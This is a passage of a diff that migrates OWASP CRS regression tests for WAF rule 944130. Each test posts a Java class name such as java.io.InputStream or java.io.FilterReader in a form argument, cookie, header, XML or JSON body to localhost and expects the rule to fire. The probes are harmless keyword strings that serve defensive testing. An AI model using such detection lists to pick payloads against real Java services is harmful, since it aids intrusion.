"{\"test\": \"java.io.FilterOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log: + expect_ids: [944130] + - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log: + expect_ids: [944130] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log: + expect_ids: [944130] + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: 